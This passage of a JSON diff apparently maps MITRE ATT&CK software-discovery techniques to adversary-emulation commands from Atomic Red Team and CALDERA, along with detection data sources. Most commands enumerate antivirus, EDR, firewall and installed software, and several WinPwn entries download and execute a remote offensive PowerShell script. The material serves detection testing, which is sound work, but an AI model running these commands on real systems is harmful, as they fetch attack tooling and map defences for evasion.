from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + null, + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1518.001", + "command_list": [ + "netsh.exe advfirewall show allprofiles\ntasklist.exe\ntasklist.exe | findstr /i virus\ntasklist.exe | findstr /i cb\ntasklist.exe | findstr /i defender\ntasklist.exe | findstr /i cylance\n", + "get-process | ?{$_.Description -like \"*virus*\"}\nget-process | ?{$_.Description -like \"*carbonblack*\"}\nget-process | ?{$_.Description -like \"*defender*\"}\nget-process | ?{$_.Description -like \"*cylance*\"}\n", + "ps aux | egrep 'Little\\ Snitch|CbOsxSensorService|falcond|nessusd|santad|CbDefense|td-agent|packetbeat|filebeat|auditbeat|osqueryd|BlockBlock|LuLu'\n", + "ps aux | egrep 'falcond|nessusd|cbagentd|td-agent|packetbeat|filebeat|auditbeat|osqueryd'\n", + "fltmc.exe | findstr.exe 385201\n", + "wmic.exe /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List", + "find /Applications/ -maxdepth 2 -iname *.app | grep -io \"[a-z ]*\\.app\" | grep -Ei -- \"symantec|norton|bitdefender|kapersky|eset|avast|avira|malwarebytes|sophos|(trend micro)\"\n", + "wmic /NAMESPACE:\\\\root\\SecurityCenter2 PATH AntiVirusProduct GET /value\n", + "echo $(get-uac)\n", + "$NameSpace = Get-WmiObject -Namespace \"root\" -Class \"__Namespace\" | Select Name | Out-String -Stream | Select-String \"SecurityCenter\";\n$SecurityCenter = $NameSpace | Select-Object -First 1;\nGet-WmiObject -Namespace \"root\\$SecurityCenter\" -Class AntiVirusProduct | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List;\n" + ], + "commands": [ + { + "command": "netsh.exe advfirewall show allprofiles\ntasklist.exe\ntasklist.exe | findstr /i virus\ntasklist.exe | findstr /i cb\ntasklist.exe | findstr /i defender\ntasklist.exe | findstr /i cylance\n", + "source": "atomics/T1518.001/T1518.001.yaml", + "name": "Atomic Red Team Test - Software Discovery: Security Software Discovery" + }, + { + "command": "get-process | ?{$_.Description -like \"*virus*\"}\nget-process | ?{$_.Description -like \"*carbonblack*\"}\nget-process | ?{$_.Description -like \"*defender*\"}\nget-process | ?{$_.Description -like \"*cylance*\"}\n", + "source": "atomics/T1518.001/T1518.001.yaml", + "name": "Atomic Red Team Test - Software Discovery: Security Software Discovery" + }, + { + "command": "ps aux | egrep 'Little\\ Snitch|CbOsxSensorService|falcond|nessusd|santad|CbDefense|td-agent|packetbeat|filebeat|auditbeat|osqueryd|BlockBlock|LuLu'\n", + "source": "atomics/T1518.001/T1518.001.yaml", + "name": "Atomic Red Team Test - Software Discovery: Security Software Discovery" + }, + { + "command": "ps aux | egrep 'falcond|nessusd|cbagentd|td-agent|packetbeat|filebeat|auditbeat|osqueryd'\n", + "source": "atomics/T1518.001/T1518.001.yaml", + "name": "Atomic Red Team Test - Software Discovery: Security Software Discovery" + }, + { + "command": "fltmc.exe | findstr.exe 385201\n", + "source": "atomics/T1518.001/T1518.001.yaml", + "name": "Atomic Red Team Test - Software Discovery: Security Software Discovery" + }, + { + "command": "wmic.exe /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List", + "source": "atomics/T1518.001/T1518.001.yaml", + "name": "Atomic Red Team Test - Software Discovery: Security Software Discovery" + }, + { + "command": "find /Applications/ -maxdepth 2 -iname *.app | grep -io \"[a-z ]*\\.app\" | grep -Ei -- \"symantec|norton|bitdefender|kapersky|eset|avast|avira|malwarebytes|sophos|(trend micro)\"\n", + "source": "data/abilities/discovery/2dece965-37a0-4f70-a391-0f30e3331aba.yml", + "name": "Identify AV" + }, + { + "command": "wmic /NAMESPACE:\\\\root\\SecurityCenter2 PATH AntiVirusProduct GET /value\n", + "source": "data/abilities/discovery/2dece965-37a0-4f70-a391-0f30e3331aba.yml", + "name": "Identify AV" + }, + { + "command": "echo $(get-uac)\n", + "source": "data/abilities/discovery/7c42a30c-c8c7-44c5-80a8-862d364ac1e4.yml", + "name": "Determine whether or not UAC is enabled" + }, + { + "command": "$NameSpace = Get-WmiObject -Namespace \"root\" -Class \"__Namespace\" | Select Name | Out-String -Stream | Select-String \"SecurityCenter\";\n$SecurityCenter = $NameSpace | Select-Object -First 1;\nGet-WmiObject -Namespace \"root\\$SecurityCenter\" -Class AntiVirusProduct | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List;\n", + "source": "data/abilities/discovery/8c06ebf8-bacf-486b-bd77-21ba8c5a5777.yml", + "name": "Identify Firewalls" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1518.001", + "display_name": "Software Discovery: Security Software Discovery", + "atomic_tests": [ + { + "name": "Security Software Discovery", + "auto_generated_guid": "f92a380f-ced9-491f-b338-95a991418ce2", + "description": "Methods to identify Security Software on an endpoint\n\nwhen sucessfully executed, the test is going to display running processes, firewall configuration on network profiles\nand specific security software.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "netsh.exe advfirewall show allprofiles\ntasklist.exe\ntasklist.exe | findstr /i virus\ntasklist.exe | findstr /i cb\ntasklist.exe | findstr /i defender\ntasklist.exe | findstr /i cylance\n", + "name": "command_prompt" + } + }, + { + "name": "Security Software Discovery - powershell", + "auto_generated_guid": "7f566051-f033-49fb-89de-b6bacab730f0", + "description": "Methods to identify Security Software on an endpoint\n\nwhen sucessfully executed, powershell is going to processes related AV products if they are running.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "get-process | ?{$_.Description -like \"*virus*\"}\nget-process | ?{$_.Description -like \"*carbonblack*\"}\nget-process | ?{$_.Description -like \"*defender*\"}\nget-process | ?{$_.Description -like \"*cylance*\"}\n", + "name": "powershell" + } + }, + { + "name": "Security Software Discovery - ps (macOS)", + "auto_generated_guid": "ba62ce11-e820-485f-9c17-6f3c857cd840", + "description": "Methods to identify Security Software on an endpoint\nwhen sucessfully executed, command shell is going to display AV/Security software it is running.\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "command": "ps aux | egrep 'Little\\ Snitch|CbOsxSensorService|falcond|nessusd|santad|CbDefense|td-agent|packetbeat|filebeat|auditbeat|osqueryd|BlockBlock|LuLu'\n", + "name": "sh" + } + }, + { + "name": "Security Software Discovery - ps (Linux)", + "auto_generated_guid": "23b91cd2-c99c-4002-9e41-317c63e024a2", + "description": "Methods to identify Security Software on an endpoint\nwhen sucessfully executed, command shell is going to display AV/Security software it is running.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "ps aux | egrep 'falcond|nessusd|cbagentd|td-agent|packetbeat|filebeat|auditbeat|osqueryd'\n", + "name": "sh" + } + }, + { + "name": "Security Software Discovery - Sysmon Service", + "auto_generated_guid": "fe613cf3-8009-4446-9a0f-bc78a15b66c9", + "description": "Discovery of an installed Sysinternals Sysmon service using driver altitude (even if the name is changed).\n\nwhen sucessfully executed, the test is going to display sysmon driver instance if it is installed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "fltmc.exe | findstr.exe 385201\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Security Software Discovery - AV Discovery via WMI", + "auto_generated_guid": "1553252f-14ea-4d3b-8a08-d7a4211aa945", + "description": "Discovery of installed antivirus products via a WMI query.\n\nwhen sucessfully executed, the test is going to display installed AV software.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "wmic.exe /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List", + "name": "command_prompt", + "elevation_required": true + } + } + ] + }, + { + "description": "Identify AV", + "id": "2dece965-37a0-4f70-a391-0f30e3331aba", + "name": "Discover antivirus programs", + "platforms": { + "darwin": { + "sh": { + "command": "find /Applications/ -maxdepth 2 -iname *.app | grep -io \"[a-z ]*\\.app\" | grep -Ei -- \"symantec|norton|bitdefender|kapersky|eset|avast|avira|malwarebytes|sophos|(trend micro)\"\n", + "parsers": { + "plugins.stockpile.app.parsers.antivirus": [ + { + "source": "host.installed.av" + } + ] + } + } + }, + "windows": { + "psh": { + "command": "wmic /NAMESPACE:\\\\root\\SecurityCenter2 PATH AntiVirusProduct GET /value\n", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.installed.av" + } + ] + } + } + } + }, + "tactic": "discovery", + "technique": { + "attack_id": "T1518.001", + "name": "Software Discovery: Security Software Discovery" + } + }, + { + "id": "7c42a30c-c8c7-44c5-80a8-862d364ac1e4", + "name": "UAC Status", + "description": "Determine whether or not UAC is enabled", + "tactic": "discovery", + "technique": { + "attack_id": "T1518.001", + "name": "Software Discovery: Security Software Discovery" + }, + "platforms": { + "windows": { + "psh,pwsh": { + "command": "echo $(get-uac)\n" + } + } + } + }, + { + "id": "8c06ebf8-bacf-486b-bd77-21ba8c5a5777", + "name": "Identify Firewalls", + "description": "Identify Firewalls", + "tactic": "discovery", + "technique": { + "attack_id": "T1518.001", + "name": "Software Discovery: Security Software Discovery" + }, + "platforms": { + "windows": { + "psh": { + "command": "$NameSpace = Get-WmiObject -Namespace \"root\" -Class \"__Namespace\" | Select Name | Out-String -Stream | Select-String \"SecurityCenter\";\n$SecurityCenter = $NameSpace | Select-Object -First 1;\nGet-WmiObject -Namespace \"root\\$SecurityCenter\" -Class AntiVirusProduct | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List;\n" + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "firewall", + "definition": "Information associated with the network security system, running locally on an endpoint or remotely in a cloud environment, that monitors and controls incoming and outgoing network traffic based on predetermined security rules.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Linux", + "macOS", + "Windows", + "Google Workspace" + ], + "data_component": "firewall metadata", + "description": "Data and information that describe a firewall system and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "firewall" + }, + { + "data_source": "firewall", + "definition": "Information associated with the network security system, running locally on an endpoint or remotely in a cloud environment, that monitors and controls incoming and outgoing network traffic based on predetermined security rules.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Linux", + "macOS", + "Windows", + "Google Workspace" + ], + "data_component": "firewall enumeration", + "description": "A firewall system or element (rule) was listed.", + "source_data_element": "user", + "relationship": "listed", + "target_data_element": "firewall" + }, + { + "data_source": "firewall", + "definition": "Information associated with the network security system, running locally on an endpoint or remotely in a cloud environment, that monitors and controls incoming and outgoing network traffic based on predetermined security rules.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Linux", + "macOS", + "Windows", + "Google Workspace" + ], + "data_component": "firewall enumeration", + "description": "A firewall system or element (rule) was listed.", + "source_data_element": "user", + "relationship": "listed", + "target_data_element": "firewall rule" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + [ + "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1518", + "command_list": [ + "reg query \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\" /v svcVersion\n", + "Get-ItemProperty HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize\nGet-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize\n", + "/usr/libexec/PlistBuddy -c \"print :CFBundleShortVersionString\" /Applications/Safari.app/Contents/Info.plist\n/usr/libexec/PlistBuddy -c \"print :CFBundleVersion\" /Applications/Safari.app/Contents/Info.plist\n", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nDotnetsearch -noninteractive -consoleoutput", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ndotnet -consoleoutput -noninteractive", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\npowerSQL -noninteractive -consoleoutput", + "which google-chrome\n", + "which go\n", + "python3 --version;python2 --version;python --version\n", + "python3 --version&python2 --version&python --version\n", + "(Get-ItemProperty 'HKLM:\\SOFTWARE\\Microsoft\\Internet Explorer').Version\n" + ], + "commands": [ + { + "command": "reg query \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\" /v svcVersion\n", + "source": "atomics/T1518/T1518.yaml", + "name": "Atomic Red Team Test - Software Discovery" + }, + { + "command": "Get-ItemProperty HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize\nGet-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize\n", + "source": "atomics/T1518/T1518.yaml", + "name": "Atomic Red Team Test - Software Discovery" + }, + { + "command": "/usr/libexec/PlistBuddy -c \"print :CFBundleShortVersionString\" /Applications/Safari.app/Contents/Info.plist\n/usr/libexec/PlistBuddy -c \"print :CFBundleVersion\" /Applications/Safari.app/Contents/Info.plist\n", + "source": "atomics/T1518/T1518.yaml", + "name": "Atomic Red Team Test - Software Discovery" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nDotnetsearch -noninteractive -consoleoutput", + "source": "atomics/T1518/T1518.yaml", + "name": "Atomic Red Team Test - Software Discovery" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ndotnet -consoleoutput -noninteractive", + "source": "atomics/T1518/T1518.yaml", + "name": "Atomic Red Team Test - Software Discovery" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\npowerSQL -noninteractive -consoleoutput", + "source": "atomics/T1518/T1518.yaml", + "name": "Atomic Red Team Test - Software Discovery" + }, + { + "command": "which google-chrome\n", + "source": "data/abilities/discovery/830bb6ed-9594-4817-b1a1-c298c0f9f425.yml", + "name": "Check to see if Gooogle Chrome browser is installed" + }, + { + "command": "which go\n", + "source": "data/abilities/discovery/9849d956-37ea-49f2-a8b5-f2ca080b315d.yml", + "name": "Check to see if GoLang is installed" + }, + { + "command": "python3 --version;python2 --version;python --version\n", + "source": "data/abilities/discovery/b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml", + "name": "Check to see what version of python is installed" + }, + { + "command": "python3 --version&python2 --version&python --version\n", + "source": "data/abilities/discovery/b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml", + "name": "Check to see what version of python is installed" + }, + { + "command": "(Get-ItemProperty 'HKLM:\\SOFTWARE\\Microsoft\\Internet Explorer').Version\n", + "source": "data/abilities/discovery/c9be8043-a445-4cbf-b77b-ed7bb007fc7c.yml", + "name": "Determine the version of Internet Explorer running" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1518", + "display_name": "Software Discovery", + "atomic_tests": [ + { + "name": "Find and Display Internet Explorer Browser Version", + "auto_generated_guid": "68981660-6670-47ee-a5fa-7e74806420a4", + "description": "Query the registry to determine the version of internet explorer installed on the system.\nUpon execution, version information about internet explorer will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "reg query \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\" /v svcVersion\n", + "name": "command_prompt" + } + }, + { + "name": "Applications Installed", + "auto_generated_guid": "c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b", + "description": "Query the registry to determine software and versions installed on the system. Upon execution a table of\nsoftware name and version information will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Get-ItemProperty HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize\nGet-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize\n", + "name": "powershell" + } + }, + { + "name": "Find and Display Safari Browser Version", + "auto_generated_guid": "103d6533-fd2a-4d08-976a-4a598565280f", + "description": "Adversaries may attempt to get a listing of non-security related software that is installed on the system. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "name": "sh", + "elevation_required": false, + "command": "/usr/libexec/PlistBuddy -c \"print :CFBundleShortVersionString\" /Applications/Safari.app/Contents/Info.plist\n/usr/libexec/PlistBuddy -c \"print :CFBundleVersion\" /Applications/Safari.app/Contents/Info.plist\n" + } + }, + { + "name": "WinPwn - Dotnetsearch", + "auto_generated_guid": "7e79a1b6-519e-433c-ad55-3ff293667101", + "description": "Search for any .NET binary file in a share using the Dotnetsearch function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nDotnetsearch -noninteractive -consoleoutput", + "name": "powershell" + } + }, + { + "name": "WinPwn - DotNet", + "auto_generated_guid": "10ba02d0-ab76-4f80-940d-451633f24c5b", + "description": "Search for .NET Service-Binaries on this system via winpwn dotnet function of WinPwn.", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ndotnet -consoleoutput -noninteractive", + "name": "powershell" + } + }, + { + "name": "WinPwn - powerSQL", + "auto_generated_guid": "0bb64470-582a-4155-bde2-d6003a95ed34", + "description": "Start PowerUpSQL Checks using powerSQL function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\npowerSQL -noninteractive -consoleoutput", + "name": "powershell" + } + } + ] + }, + { + "id": "830bb6ed-9594-4817-b1a1-c298c0f9f425", + "name": "Check Chrome", + "description": "Check to see if Gooogle Chrome browser is installed", + "tactic": "discovery", + "technique": { + "attack_id": "T1518", + "name": "Software Discovery" + }, + "platforms": { + "darwin": { + "sh": { + "command": "which google-chrome\n" + } + }, + "linux": { + "sh": { + "command": "which google-chrome\n" + } + } + } + }, + { + "id": "9849d956-37ea-49f2-a8b5-f2ca080b315d", + "name": "Check Go", + "description": "Check to see if GoLang is installed", + "tactic": "discovery", + "technique": { + "attack_id": "T1518", + "name": "Software Discovery" + }, + "platforms": { + "darwin": { + "sh": { + "command": "which go\n" + } + }, + "linux": { + "sh": { + "command": "which go\n" + } + } + } + }, + { + "id": "b18e8767-b7ea-41a3-8e80-baf65a5ddef5", + "name": "Check Python", + "description": "Check to see what version of python is installed", + "tactic": "discovery", + "technique": { + "attack_id": "T1518", + "name": "Software Discovery" + }, + "platforms": { + "darwin": { + "sh": { + "command": "python3 --version;python2 --version;python --version\n" + } + }, + "linux": { + "sh": { + "command": "python3 --version;python2 --version;python --version\n" + } + }, + "windows": { + "cmd": { + "command": "python3 --version&python2 --version&python --version\n" + } + } + } + }, + { + "id": "c9be8043-a445-4cbf-b77b-ed7bb007fc7c", + "name": "Internet Explorer Version", + "description": "Determine the version of Internet Explorer running", + "tactic": "discovery", + "technique": { + "attack_id": "T1518", + "name": "Software Discovery" + }, + "platforms": { + "windows": { + "psh": { + "command": "(Get-ItemProperty 'HKLM:\\SOFTWARE\\Microsoft\\Internet Explorer').Version\n" + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "firewall", + "definition": "Information associated with the network security system, running locally on an endpoint or remotely in a cloud environment, that monitors and controls incoming and outgoing network traffic based on predetermined security rules.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Linux", + "macOS", + "Windows", + "Google Workspace" + ], + "data_component": "firewall metadata", + "description": "Data and information that describe a firewall system and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "firewall" + }, + { + "data_source": "firewall", + "definition": "Information associated with the network security system, running locally on an endpoint or remotely in a cloud environment, that monitors and controls incoming and outgoing network traffic based on predetermined security rules.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Linux", + "macOS", + "Windows", + "Google Workspace" + ], + "data_component": "firewall enumeration", + "description": "A firewall system or element (rule) was listed.", + "source_data_element": "user", + "relationship": "listed", + "target_data_element": "firewall" + }, + { + "data_source": "firewall", + "definition": "Information associated with the network security system, running locally on an endpoint or remotely in a cloud environment, that monitors and controls incoming and outgoing network traffic based on predetermined security rules.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Linux", + "macOS", + "Windows", + "Google Workspace" + ], + "data_component": "firewall enumeration", + "description": "A firewall system or element (rule) was listed.", + "source_data_element": "user", + "relationship": "listed", + "target_data_element": "firewall rule" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + 